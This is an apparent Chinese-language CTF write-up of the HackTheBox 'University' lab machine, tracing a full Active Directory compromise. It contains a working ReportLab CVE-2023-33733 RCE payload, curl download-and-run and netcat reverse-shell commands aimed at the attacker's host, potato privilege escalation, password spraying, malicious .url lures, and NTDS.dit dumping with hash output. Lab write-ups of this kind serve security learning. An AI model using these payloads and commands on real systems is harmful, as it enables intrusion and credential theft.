HackTheBox - Machine - University - Patch
MANESEC on 2024-12-23
Recommand: Let's Sign Up HTB Academy to get Higher level of knowledge :P
非常推薦: 想要變强嗎? 快來加入 HTB Academy 獲得更高級的知識吧 :P
University - Patched
https://www.hackthebox.com/achievement/machine/463126/632
從初步的掃描開始,使用 nmap 確認目標是一台 Active Directory 伺服器,接著通過 80 端口進入一個名為 university.htb 的網站。創建賬號後,發現可以導出 PDF 文件,進一步分析後發現該文件使用了 ReportLab 框架,這引發了對已知 RCE 漏洞的利用。成功觸發 RCE 後,攻擊者上傳了一個 shell,獲得了系統的控制權,並在 C:\Web\University 目錄中發現了一個用戶的密碼。隨後,利用該用戶的權限,攻擊者進一步探索系統,發現了多個用戶和潛在的權限提升路徑。透過分析系統的服務和腳本,攻擊者推測出可能的高權限用戶,並設法生成簽名證書以獲取更高的訪問權限。最終,攻者利用 SeBackupPrivilege 和其他權限,成功獲取了系統的敏感數據,包括 NTDS.dit 文件,並提取了管理員的 hash 值。
可以看出來捷徑已經被patch了。
Nmap
首先一上來就是使用 nmap 去掃描一下:
$ sudo nmap -sS -sC -sV -oA save -p- --min-rate=1000 10.129.231.235
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 16:30 CST
Nmap scan report for university.htb (10.129.231.235)
Host is up (0.086s latency).
Not shown: 65508 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: University
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-27 15:31:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
61376/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows可以看到這是一臺 AD,不過目前來説什麽也沒有。
80 - University website
所以從80端口開始,打開後會跳轉到 university.htb 這個域名。
創建一個賬號后,隨便敲一些東西,剛好右上角有一個導出的按鈕,
點擊後會嘗試下載 PDF 文件,使用 xxd 看一下,是 ReportLab 的框架,這個其實就是 SolarLab 這臺機器。
Exploit ReportLab with CVE-2023-33733
由於 ReportLab 這個框架之前爆過遠程的RCE 漏洞,所以可以嘗試一下,因爲payload很長,所以需要找一個可以放很多文字的文本框來放payload,剛好看到 Bio 這裏可以放很多文字,
於是就把payload 放上去測試一下,點擊 Profile Export ,結果觸發了RCE:
payload 如下:
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl 10.10.16.31') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>既然成功的得到了RCE,那就可以上傳一個shell,分段后如下:
curl 10.10.16.31/mane.exe -o mane.exe mane.exe
這樣就得到一個shell。
Finding wao user password from backup script
拿到shell的一瞬間,
發現自己在 C:\Web\University,於是就看看 C:\Web 裏面有些什麽,來到 C:\Web\DB Backups看到:
裏面有一個 db-backup-automator.ps1 的文件 如下:
$sourcePath = "C:\Web\University\db.sqlite3"
$destinationPath = "C:\Web\DB Backups\"
$7zExePath = "C:\Program Files\7-Zip\7z.exe"
$zipFileName = "DB-Backup-$(Get-Date -Format 'yyyy-MM-dd').zip"
$zipFilePath = Join-Path -Path $destinationPath -ChildPath $zipFileName
$7zCommand = "& `"$7zExePath`" a `"$zipFilePath`" `"$sourcePath`" -p'WebAO1337'"
Invoke-Expression -Command $7zCommand抓取一下用戶噴射一下密碼:
$ netexec smb 10.129.231.193 -u user.txt -p 'WebAO1337' --continue-on-success
看來是 WAO 這個用戶的密碼。
Collect ADObject with SharpHound
既然有了shell,那就順便遛下狗:
.\SharpHound.exe -c all
Exploit to service type - (Untended way and Patched)
在 whoami /all 中可以看到:
使用 whoami /all 中可以看到 Service asserted identity,也就是當前的登錄類型是 service,不難想到當前賬號有權限去執行錄類型為 service。儅登陸類型是 service的時候,會有特殊權限,它可以訪問系統的資源和執行後臺任務,這樣子就可以做一些騷操作。
所以看一下權限,很可惜沒有什麽特殊權限:
因爲當前進程沒有其他的特殊權限,既然這個用戶可以登錄服務,也知道了密碼,那麽就可以使用 runascs 來强制指定 logon type為 service,這樣子第一個進程永遠都是權限比較大的:
PS C:\mane> .\runascs.exe wao WebAO1337 "C:\mane\mane.exe" -l 5 -b
根據微軟的文檔,service 的 logon type 是5,所以 -l 5 就是這麽來的。
登陸好之後會得到其他的特殊權限,由於 Disabled 可以使用 EnableAllTokenPrivs 來啓用,所以:
得到 SeImpersonatePrivilege。然後就是使用土豆:
PS C:\mane> .\godpotato -cmd "nc64.exe -t -e C:\Windows\System32\cmd.exe 10.10.16.31 9999"得到 NT System:
Subnet discover
由於目前是地權限的用戶,看不到什麽東西,在 ipconfig 中可以看到機器内部還有一個網絡 Internal-VSwitch1:
PS C:\web\University> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (Internal-VSwitch1):
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::47c0:fbc9:2d7b:e4bb%6
IPv4 Address. . . . . . . . . . . : 192.168.99.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::897d:c349:37f:4f67
Link-local IPv6 Address . . . . . : fe80::f6b5:7e57:9ce2:53d2%4
IPv4 Address. . . . . . . . . . . : 10.129.231.193
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%4
10.129.0.1這是一個 192.168.99.1 的段,這裏使用 rustscan 來快速掃描:
PS C:\mane> .\rustscan.exe -a 192.168.99.0/24 -g -p 7,21,22,23,25,465,587,43,49,53,69,79,80,443,88,110,995,111,113,123,135,593,137,138,139,139,445,143,993,161,162,10161,10162,194,6667,6660,7000,2641,389,636,3268,3269,500,502,512,513,514,515,548,554,8554,623,631,700,873,1026,1080,1098,1099,1050,1414,1433,1521,1522,1529,1723,1883,2049,2301,2381,2375,2376,3128,3260,3299,3306,3389,3632,3690,3702,4369,4786,4840,5000,5353,5432,5433,5439,5555,5601,5671,5672,5800,5801,5900,5901,5984,6984,5985,5986,5985,5986,6011,6379,8009,8086,8089,8333,18333,38333,18444,9000,9001,9042,9160,9100,9200,10000,11211,15672,24007,24008,24009,49152,27017,27018,44134,44818,47808,50030,50060,50070,50075,50090 192.168.99.1 -> [53,80,88,593,135,139,139,445,389,636,3268,3269,5985,5985] 192.168.99.2 -> [135,139,139,445,5985,5985] 192.168.99.12 -> [22]
得知内網還有兩臺機器。
Login as wao in Linux machine (LAB-2)
嘗試使用 wao 用戶去登錄,目前也只有這個密碼:
Linux 一上來就直接就給了個 root 權限,裏面有一些舊版本的文件,看了一圈之後也沒發現有什麽好看的。
Login as wao in Windows machine (WS-3)
嘗試使用 wao 這個用戶登陸下,可以看到這個用戶登錄winrm:
$ netexec smb 192.168.99.2 -u wao -p 'WebAO1337'
$ netexec winrm 192.168.99.2 -u wao -p 'WebAO1337'
$ evil-winrm -i 192.168.99.2 -u wao -p 'WebAO1337'
直接去看一下哪些用戶:
*Evil-WinRM* PS C:\> cd users
*Evil-WinRM* PS C:\> ls
但很可惜,沒有什麽有價值的東西。
Walking Program Files Folders
但是在 C:\Program Files 裏面看到了有一個 Automation-Scripts 的目錄:
這暗示著有脚本在後臺定時運行。
上面的 get-lectures.ps1 中暗示了和一開始的University有關係。
Guessing what user run as background
不過可以直接從 ldap 中猜到哪些用戶在運行,只需要看 lastLogon 的時間就可以猜到:
所以計劃任務最有可能的就是 Martin.T 和 Rose.L 這個用戶。
Back to University website
回到一開始的網頁,由於從上面的脚本的名字中猜測是關於課程有關的,所以就找辦法登錄教授的權限。
登出后看到:
然而在登錄的頁面中看到 signed-certificate,點擊後來到:
看起來需要一個證書,但問題是服務器是怎麽區分證書和用戶名呢?
Finding a CA and Professor
所以我再一次登錄低權限的賬號,看到左邊有一個 Request Signed-Cert 這個按鈕:
HINT: to generate a CSR(certificate signed request) using openssl tool:
openssl req -newkey rsa:2048 -keyout PK.key -out My-CSR.csr生成一張請求的證書只需要這個命令:
openssl req -newkey rsa:2048 -keyout PK.key -out My-CSR.csrPlease note that the "common name" and "email address" of your csr file should match your username and email.
其中最需要注意的是 "common name" 和 "email address" 是你注冊的用戶名和 email。
科普:請求的證書一般是 CSR,裏面包括你生成CSR時的你輸入的内容。服務器會驗證你的信息,沒問題后才會使用 root 的私鑰和公鑰去給你的 CSR 簽名,這樣你就得到了新的證書。
Finding Root CA files
既然拿到了shell,那就可以看一下 root 的私鑰和公鑰在哪裏,所以在 C:\web\University\University\certificate_utils.py 中簽名的代碼如下:
PS C:\web\University\University> type certificate_utils.py
from .settings import rooCA_Cert, rooCA_PrivKey
from base64 import b64encode
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from django.http import HttpResponse, HttpResponseBadRequest
import subprocess
def get_csr_details(csr_path):
with open(csr_path, "rb") as csr_file:
csr = x509.load_pem_x509_csr(csr_file.read(), default_backend())
subject = csr.subject
common_name = subject.get_attributes_for_oid(x509.NameOID.COMMON_NAME)[0].value
email_address = subject.get_attributes_for_oid(x509.NameOID.EMAIL_ADDRESS)[0].value
return common_name, email_address
def verify_signed_Cert(signed_cert_bytes):
with open(rooCA_Cert, "rb") as ca_file:
ca_certificate = x509.load_pem_x509_certificate(ca_file.read(), default_backend())
try:
signed_certificate = x509.load_pem_x509_certificate(signed_cert_bytes, default_backend())
ca_certificate.public_key().verify(
signed_certificate.signature,
signed_certificate.tbs_certificate_bytes,
padding.PKCS1v15(),
signed_certificate.signature_hash_algorithm,
)
return True
except:
return False
def get_certificate_details(cert_bytes):
cert = x509.load_pem_x509_certificate(cert_bytes, default_backend())
subject = cert.subject
common_name = subject.get_attributes_for_oid(x509.NameOID.COMMON_NAME)[0].value
email_address = subject.get_attributes_for_oid(x509.NameOID.EMAIL_ADDRESS)[0].value
return common_name, email_address
def generate_signed_cert(request, user):
command = r'"C:\\Program Files\\openssl-3.0\\x64\\bin\\openssl.exe" x509 -req -in "{}" -CA "{}" -CAkey "{}" -CAcreateserial'.format(user.csr.path, rooCA_Cert, rooCA_PrivKey)
output = subprocess.check_output(command, shell=True).decode()
# Base64 encode the content of the file
encoded_output = b64encode(output.encode()).decode()
response = HttpResponse(content_type='application/x-x509-ca-cert')
# Set the content of the file as a cookie
response.set_cookie('PSC', encoded_output)
response['Content-Disposition'] = 'attachment; filename="signed-cert.pem"'
response.write(output)
return response其中最重要的是這兩行,這裏的 .settings 定義了root 的私鑰和公鑰的位置:
from .settings import rooCA_Cert, rooCA_PrivKey
command = r'"C:\\Program Files\\openssl-3.0\\x64\\bin\\openssl.exe" x509 -req -in "{}" -CA "{}" -CAkey "{}" -CAcreateserial'.format(user.csr.path, rooCA_Cert, rooCA_PrivKey)所以去找一下 settings.py ,看到 root 的私鑰和公鑰其實就是CA文件夾下的 rootCA.crt 和 rootCA.key:
PS C:\web\University\University> type settings.py
<省略>
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
<省略>
rooCA_Cert = os.path.join(BASE_DIR, 'CA/rootCA.crt')
rooCA_PrivKey = os.path.join(BASE_DIR, 'CA/rootCA.key')所以打開那個文件後,確實有這兩個文件存在:
於是把這兩個文件下載下來。
Finding Database
另外從上面的settings.py文件中也可以看到,數據庫是以 sqlite3 的形式:
下載后使用 sqlitebrowser 打開,可以找到一些 Professor 的名字:
内容如下:
id password last_login username first_name last_name bio csr is_active is_staff is_superuser failed_login_attempts address joined_at image user_type email
2 pbkdf2_sha256$600000$igb7CzR3ivxQT4urvx0lWw$dAfkiIa438POS8K8s2dRNLy2BKZv7jxDnVuXqbZ61+s= 2024-02-26 01:47:32.992418 george george lantern 1 0 0 0 Canada West - Vancouver 2024-02-19 23:23:16.293609 static/assets/images/users_profiles/2.png Professor george@university.htb
3 pbkdf2_sha256$600000$i8XRGybY2ASqA3kEuTW4XH$SwK7A52nA1KOnuniKifqWzrjiIyOnrZu7sf+Zvq44qc= 2024-02-20 01:06:28.437570 carol Carol Helgen 1 0 0 0 USA - Washington 2024-02-19 23:25:14.919010 static/assets/images/users_profiles/3.jpg Professor carol@science.com
4 pbkdf2_sha256$600000$Bg8pRHaZsbGpLwirrZPvvn$7CtXYJhBDrGhiCvjma7X/AOKRWZS2SP0H6PAXvT96Vw= 2024-02-20 00:59:29.687668 Nour Nour Qasso 1 0 0 0 Germany - Frankfurt 2024-02-19 23:27:04.700197 static/assets/images/users_profiles/4.jpg Professor nour.qasso@gmail.com
5 pbkdf2_sha256$600000$VzP8VVjEQgQw6HvYAftmCl$s9k3UC/e2++hhQDF2KzhunOaAqxbi4rugRb42dC6qr0= 2024-02-20 00:37:55.455163 martin.rose Martin Rose 1 0 0 0 US West - Los Angeles 2024-02-19 23:28:49.293710 static/assets/images/users_profiles/5.jpg Professor martin.rose@hotmail.com
6 pbkdf2_sha256$600000$1s48WhgRDulQ6FsNgnXjot$SZ4piS9Ryf4mgIj0prEjN+F0pGEDtNti3b9WaQfAeTk= 2024-09-16 12:43:05.500724 nya Nya Laracrof static/assets/uploads/CSRs/6_mnY36oU.csr 1 0 0 0 UK - London 2024-02-19 23:31:30.168489 static/assets/images/users_profiles/6.jpg Professor nya.laracrof@skype.com
7 pbkdf2_sha256$600000$70XtdR4HrHHignt7EHiOpT$RP9/4PKHmbtCBq0FOPqyppQKjXntM89vc7jGyjk/zAk= 2024-02-26 01:42:16.677697 Steven.U Steven Universe <h3>The First student in this university!</h3> static/assets/uploads/CSRs/7.csr 1 0 0 0 Italy - Milan 2024-02-25 23:08:44.508623 static/assets/images/users_profiles/7.jpeg Student steven@yahoo.com
9 pbkdf2_sha256$600000$D3fYlGCkPVjI39TFESrDde$AdWvYT7nqj9FH76oqF5yTfEou6GEXrMXVbgnCJ6kS58= 2024-12-22 04:40:43.221671 mane asd sad <p><para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('mane1.exe') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'"><br> exploit<br></font></para></p> 1 0 0 0 asd 2024-12-22 04:40:37.566781 static/assets/images/users_profiles/default.png Student mane@manesec.com其中 Professor 的用戶是這些:
george Carol Nour Martin Nya
Self-signed certificates
由於上面得到了root 的私鑰和公鑰,那就可以自己給自己簽名,所以先僞造 Professor 的用戶生成 CSR,這裏就隨機挑一個Professor的用戶名:
$ openssl req -newkey rsa:2048 -keyout PK.key -out My-CSR.csr
密碼可以隨便填,然後使用 root 的私鑰和公鑰簽名:
$ openssl x509 -req -in My-CSR.csr -CA rootCA.crt -CAkey rootCA.key -CAcreateseria
得到一大串 base64,可以使用 -out 的參數輸出到 save.pem 這個文件中。
$ openssl x509 -req -in My-CSR.csr -CA rootCA.crt -CAkey rootCA.key -CAcreateserial -out save.pem
Login as Professor via signed-certificate and fix the certificate
既然得到了簽名后的 save.pem,那就嘗試使用這張證書登錄看看會發生什麽:
上傳證書后,點擊登錄,成功的進入了 george 這個用戶:
然後看到左邊有一個 Create a New course 這個按鈕,但是:
他會告訴你,簽名的證書怪怪的,因爲少了 Professor-Signed-Certificate,叫你重新請求一張證書,那就把一開始僞造教授證書的CSR上傳上去,也就是 My-CSR.csr,點擊提交後會下載一個簽名後的文件:
所以再次登出,使用這個證書登陸後點擊Create a New course就沒有報錯:
Create a new course and upload a new lecture
現在可以創建課程了,隨便寫一些名字:
點擊創建後會得到:
在最底下會有一個按鈕:
也就是新增教材 Add a new lecture。點擊後來到這個網頁:
Please provide the signed "lecture.zip" file(which includes the lecture file and all it's references files) and the detached digital signature file(lecture.zip.sig). Please note that our team will only check .docx, .pptx, .pdf and .url(lecture references files for the students) inside the "lecture.zip" file. So any other files included in the lecture file will be ignored. Here is an example for a good "lecture.zip" file: Perfect-Lecture-Sample.zip
請提供已簽署的 「lecture.zip 」檔案(包含講義檔案及其所有參考檔案)以及獨立的數位簽章檔案(lecture.zip.sig)。 請注意,我們的團隊只會檢查 「lecture.zip」 檔案內的 .docx、.pptx、.pdf 和 .url(給學生的講義參考檔案)。因此,講義檔案中包含的任何其他檔案都會被忽略。 下面是一個好的 「lecture.zip」 檔案範例: Perfect-Lecture-Sample.zip
點擊 Perfect-Lecture-Sample.zip 就會得到一個例子:
看起來裏面有url,所以先創建一個惡意的url,嘗試下能不能自動運行。如果不能就在創建惡意的 pptx 等。
Making Malicious zip and URL File Attack
url 其實可以運行惡意的文件,參考這裏,如下:
$ cat mane.url
[InternetShortcut]
URL=C:\mane\dc01.exe
$ unix2dos mane.url
$ zip mane.zip mane.url
准備好了之後,由於 WS-3 這臺機器在内部網絡,沒有辦法直接訪問外部網絡,所以需要準備一個 pivot 的payload,準備好了之後可以直接使用 evil-winrm 上傳上去:
這裏就放在 C:\mane\dc01.exe中。
Self-signed zip file and change public key
製作好了之後就按照網頁的提示去簽名:
$ gpg -u george --detach-sign mane.zip
但是出錯了,原因是沒有 secret key,所以嘗試新建一個secret key:
$ gpg --gen-key
然後再一次的簽名,結果成功了:
之後把他上傳到網頁上:
點擊提交後出現錯誤:
由於我的 public key 是在新建一個secret key的時候生成的,和服務器的對不上,好在網頁中允許我修改 Public Key:
於是根據網頁的提示來導出 public key:
導出成功后重新上傳:
結果修改 public key 成功了。
Upload a malicious zip file
既然成功了,那就重新上傳看看:
看起來沒有問題,網頁也提示了我們團隊等下就會聯係你,也就提示說一會就有人來點擊。
Shell as martin.t on WS-3
等待一段時間後得到了 martin.t 用戶的 shell,它是來自内網的 windows 的機器:
看了一下是低權限的用戶:
由於一開始的get-lectures.ps1 使用 wao 這個用戶無法讀取,所以嘗試使用當前用戶 martin.t 讀取看看:
可以看到整個定時運行的邏輯就是從壓縮包中獲取 url 文件裏的路徑,然後點擊該路徑。
既然上面的提示是從 DC 中獲取的,那麽在DC中枚舉本地共享目錄也可以看到他是指定 C:\Web\University\static\assets\uploads\lectures。
get-WmiObject -class Win32_Share
但是儅訪問 C:\Program Files\Automation-Scripts\wpad-cache-cleaner.ps1 卻失敗了:
這意味著有可能這個文件是某個高級用戶在定時運行的。
Play with localpotato
在該用戶的桌面上看到有一個 README.txt:
教授們好。我們為網域電腦上的所有使用者建立了此筆記: WS-1、WS-2 和 WS-3。這些電腦自 10/29/2023 以來一直沒有更新。由於這些裝置是用於內容評估用途,因此它們應該始終擁有最新的安全更新。因此,請務必完成目前的評估,然後繼續使用「WS-4」和「WS-5」電腦。安全團隊將在下月初開始進行更新並應用新的安全政策。最誠摯的問候服務台團隊 - Rose Lanosta。
這暗示這該系統用的是老舊版本的windows,而且沒有更新,由於 systeminfo 無法運行,可以使用 powershell 來觀察下,參考:
PS > [System.Environment]::OSVersion.Version PS > Get-ComputerInfo
得到當前的版本是 Windows Server 2019 Standard,所以 localpotato 是最有可能:
Try to exploit StorSVC service
所以網上搜一下,在這篇教程告訴你 localpotato 可以寫入任何文件,儅使用 RPC 去調用SvcRebootToFlashingMode ,StorSvc 這個系統服務就會嘗試加載一個缺失的DLL文件 SprintCSP.dll。
所以下載這些源碼,編譯好SprintCSP.dll后,使用 localpotato强制寫入 C:\Windows\System32\SprintCSP.dll,但是在使用 RpcClient.exe 去調用 RPC 的時候卻出錯了:
應該是權限的問題什麽的問題導致的:
get-service storsvc
Try to exploit PrintConfig
所以需要換一個思路,如果可以寫進去 C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll ,就可以加載一些 dll,具體原理可以參考:
- https://github.com/CsEnox/SeManageVolumeExploit
- https://github.com/RedSection/printjacker/blob/main/POST.md
很可惜:
Try to write wpad-cache-cleaner.ps1
由於一開始的時候還有一個脚本 wpad-cache-cleaner.ps1 在 Automation-Scripts 的文件夾中,所以寫一行運行 payload 的命令,然後換成 dos 並上傳到 C:\mane 中:
$ echo 'start C:\mane\dc01.exe' > wpad-cache-cleaner.ps1
$ unix2dos wpad-cache-cleaner.ps1
因爲直接寫入是沒有權限的,需要用 LocalPotato.exe 强制寫入:
.\LocalPotato.exe -i .\wpad-cache-cleaner.ps1 -o '\Program Files\Automation-Scripts\wpad-cache-cleaner.ps1'
等一段時間後,真的得到了 Administrator 這個用戶:
Dumping SAM as Administrator
由於有了 admin 權限,加上他是client 機器,所以直接dump sam,看看有沒有什麽有價值的東西:
reg save hklm\system system reg save hklm\sam sam reg save hklm\security security
然後把這些文件下載下來后使用 secretsdump 導出看看:
$ secretsdump.py -sam sam -security security -system system local
Impacket v0.13.0.dev0+20241127.154729.af51dfd - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xcafb76872642f6bc09dd9e17ae7cddec
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:71ffc7b2d302f8059b92219e7d7a7ba1:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:a8bf1bae201f988dc1ca99f1043e11dc:::
[*] Dumping cached domain logon information (domain/username:hash)
UNIVERSITY.HTB/Martin.T:$DCC2$10240#Martin.T#97cacb28b851029449213555226a7dcc: (2024-12-22 20:34:49+00:00)
UNIVERSITY.HTB/Administrator:$DCC2$10240#Administrator#d215fbd6ac39c2d0e49628006db4a2ac: (2024-10-21 23:19:28+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:b005e0d4f4724296a7513d11b36ba2e9ccd669eca34e4985f48c9f6aedadd85d0ecbe634ad06cbbba69c304449de31229f57edbcd3fdca31663bdf085685dd8120eaeded1b27d744d2a466a9ec67c03bb6b6cf28f9b36cf0b0f04431f894e72fc46ba1710beb3fd0998078d482066e613084e0d7b3f7275a4098a4c62f5e4a9553eaadbd1f2241666c7cb55622b9d13bbcd2bec24107acfc91abe33844f9b9279d5784265ffae661820d6338ff4b2b6d9b560f9bcb2de02fc2620813c9cdf7944278b479d05d1509355075fa280f93dc31fd18d6fcc61b3e77091dccb9cdb4e7cefa21596d35c38647284377d6428e7c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:b51c7661e82feb147afffb324d91af34
[*] DefaultPassword
(Unknown User):v3ryS0l!dP@sswd#X
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1b8c79e73a9fe233c28cc4336b7ef8a310cf7335
dpapi_userkey:0x83c20b2c903526e92b01436284cfc32babe48018
[*] NL$KM
0000 A9 CF 8B DE AB C8 F3 82 92 9F 69 F3 F8 8B C2 F4 ..........i.....
0010 E5 6D AE 0B C5 05 41 8A B3 3C 6A 24 92 D9 F5 95 .m....A..<j$....
0020 BB 90 A6 24 55 AE 8B 6B 7C B5 B2 40 89 52 75 66 ...$U..k|..@.Ruf
0030 0E F1 23 17 89 D5 A2 AD 22 05 F5 D2 7F F6 DC 87 ..#.....".......
NL$KM:a9cf8bdeabc8f382929f69f3f88bc2f4e56dae0bc505418ab33c6a2492d9f595bb90a62455ae8b6b7cb5b240895275660ef1231789d5a2ad2205f5d27ff6dc87
[*] Cleaning up... 得到本地管理員的hash,測試后也是可用的:
$ netexec smb 192.168.99.2 -d . -u administrator -H "ba76a28db8aaeb636566a414f3e104aa"
Password Spray on DC
在上面的結果中得到一行 (Unknown User):v3ryS0l!dP@sswd#X,他沒有顯示是哪個用戶的,對著DC使用 winrm 進行密碼噴射看看:
得到了一堆用戶,所以看一下 bloodhound,驚奇的看到 BROSE.W 在 Backup Operators,而且也有 winrm:
那就直接使用 evil-winrm 去登錄 Brose.W:
$ evil-winrm -i 10.129.231.193 -u Brose.W -p 'v3ryS0l!dP@sswd#X'
看到有 SeBackupPrivilege 和 SeRestorePrivilege 那就可以濫用它。
ExploIt SeBackupPrivilege
從 SeBackupPrivilege 下載 SeBackupPrivilegeCmdLets.dll 和 SeBackupPrivilegeUtils.dll 后上傳上去,然後使用 diskshadow 打開虛擬備份磁盤:
mkdir C:\mane
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
diskshadow.exe /s c:\mane\diskshadow.txt
成功了之後加載SeBackupPrivilegeCmdLets.dll 和 SeBackupPrivilegeUtils.dll 就可以允許你拷貝 ntds.dit,有了 ntds.dit 還需要 dump sam:
Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll Copy-FileSeBackupPrivilege Z:\Windows\NTDS\ntds.dit C:\mane\ntds.dit reg save HKLM\SYSTEM system reg save HKLM\SAM sam
之後一次過下載到本地使用 secretsdump 就得到 admin 的hash:
$ secretsdump.py -sam sam -system system -ntds ntds.dit local
Impacket v0.13.0.dev0+20241127.154729.af51dfd - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x7704a47762a8cd07d2922fc3e97e02a4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e1ab6bc4d7d84111fe3e0fb271de1e0b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 53baa9d0678f975750cdfcfc8b9e6f42
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e63413bab01a0b8820983496c0be3a9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:2522eb84c83b5e9ffde18045be5b9e59:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:41c4599e48661690fa6538fe96d366de:::
university.htb\John.D:1103:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
university.htb\George.A:1104:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
WAO:1106:aad3b435b51404eeaad3b435b51404ee:da49675b9d3d5e403fa3c1c6b5c3f5a2:::
university.htb\hana:1107:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
karma.watterson:1108:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Alice.Z:1109:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Steven.P\Steven.P:1110:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Karol.J\Karol.J:1111:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Leon.K\Leon.K:1112:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Anna.C\A.Crouz:1113:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Kai.K\Kai.K:1114:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Arnold.G\Arnold.G:1115:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
